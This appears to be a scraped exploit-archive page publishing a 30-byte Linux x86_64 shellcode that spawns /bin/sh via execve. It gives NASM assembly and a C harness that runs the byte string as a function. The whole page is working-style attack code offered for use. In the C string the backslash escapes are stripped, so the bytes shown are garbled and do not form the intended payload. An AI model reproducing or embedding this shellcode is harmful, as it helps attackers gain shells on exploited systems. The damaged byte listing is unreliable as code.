[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
# Published : 2010-04-25
# Author : zbt
# Previous Title : Linux x86 - execve("/bin/bash","-p",NULL) - 33 bytes
# Next Title : Linux/x86_64 reboot(POWER_OFF) 19 bytes shellcode
# Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
# Date: 2010-04-26
# Author: zbt
# Tested on: x86_64 Debian GNU/Linux
/*
; execve("/bin/sh", ["/bin/sh"], NULL)
section .text
global _start
_start:
xor rdx, rdx
mov qword rbx, '//bin/sh'
shr rbx, 0x8
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
mov al, 0x3b
syscall
*/
int main(void)
{
char shellcode[] =
"x48x31xd2" // xor %rdx, %rdx
"x48xbbx2fx2fx62x69x6ex2fx73x68" // mov
$0x68732f6e69622f2f, %rbx
"x48xc1xebx08" // shr $0x8, %rbx
"x53" // push %rbx
"x48x89xe7" // mov %rsp, %rdi
"x50" // push %rax
"x57" // push %rdi
"x48x89xe6" // mov %rsp, %rsi
"xb0x3b" // mov $0x3b, %al
"x0fx05"; // syscall
(*(void (*)()) shellcode)();
return 0;
}